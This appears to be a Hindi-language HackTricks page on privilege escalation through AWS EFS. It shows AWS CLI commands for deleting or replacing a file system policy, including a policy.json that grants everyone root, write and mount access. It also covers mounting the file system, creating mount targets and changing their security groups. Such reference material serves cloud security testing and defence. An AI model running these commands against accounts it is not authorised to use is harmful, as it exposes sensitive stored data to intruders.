AWS - EFS Privesc

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

EFS

अधिक EFS के बारे में जानकारी:

pageAWS - EFS Enum

ध्यान रखें कि EFS को माउंट करने के लिए आपको उस सबनेटवर्क में होना चाहिए जहां EFS उजागर है और आपके पास इसका उपयोग करने की अनुमति है (सुरक्षा समूह)। यदि ऐसा हो रहा है, तो डिफ़ॉल्ट रूप से आप इसे माउंट कर सकेंगे, हालांकि, यदि यह IAM नीतियों से संरक्षित है तो आपको इसका उपयोग करने के लिए यहां उल्लिखित अतिरिक्त अनुमतियाँ होनी चाहिए।

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

इनमें से किसी भी अनुमति के साथ एक हमलावर फ़ाइल सिस्टम नीति को बदल सकता है ताकि आपको इसका उपयोग करने की अनुमति मिले, या बस इसे हटा दे ताकि डिफ़ॉल्ट उपयोग दिया जाए।

नीति को हटाने के लिए:

aws efs delete-file-system-policy \
--file-system-id <value>
इसे बदलने के लिए:
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

इस अनुमति के साथ एक हमलावर EFS को माउंट कर सकेगा। यदि EFS को माउंट करने वाले सभी व्यक्तियों को डिफ़ॉल्ट रूप से लिखने की अनुमति नहीं दी गई है, तो उसके पास केवल पढ़ने का अधिकार होगा।

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

अतिरिक्त अनुमतियाँ elasticfilesystem:ClientRootAccess और elasticfilesystem:ClientWrite का उपयोग किया जा सकता है माउंट किए जाने के बाद फ़ाइल सिस्टम के अंदर लिखने और रूट के रूप में पहुंचने के लिए।

संभावित प्रभाव: फ़ाइल सिस्टम में संवेदनशील जानकारी को ढूंढकर अप्रत्यक्ष प्रिविलेज उन्नति।

elasticfilesystem:CreateMountTarget

यदि आपके पास एक सबनेटवर्क में है जहां EFS का कोई माउंट टारगेट मौजूद नहीं है। तो एक हमलावर बस इस अधिकार के साथ अपने सबनेट में एक बना सकता है:

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

संभावित प्रभाव: फाइल सिस्टम में संवेदनशील जानकारी का पता लगाकर अप्रत्यक्ष प्रिविलेज उन्नति।

elasticfilesystem:ModifyMountTargetSecurityGroups

एक स्थिति में जहां हमलावर को यह पता चलता है कि EFS में उसके सबनेटवर्क में माउंट टारगेट है लेकिन कोई सुरक्षा समूह यातायात की अनुमति नहीं दे रहा है, तो वह उसे बस उसे बदल देगा चयनित सुरक्षा समूहों को संशोधित करके:

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

संभावित प्रभाव: फाइल सिस्टम में संवेदनशील जानकारी का पता लगाकर अप्रत्यक्ष प्रिविलेज उन्नति।

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated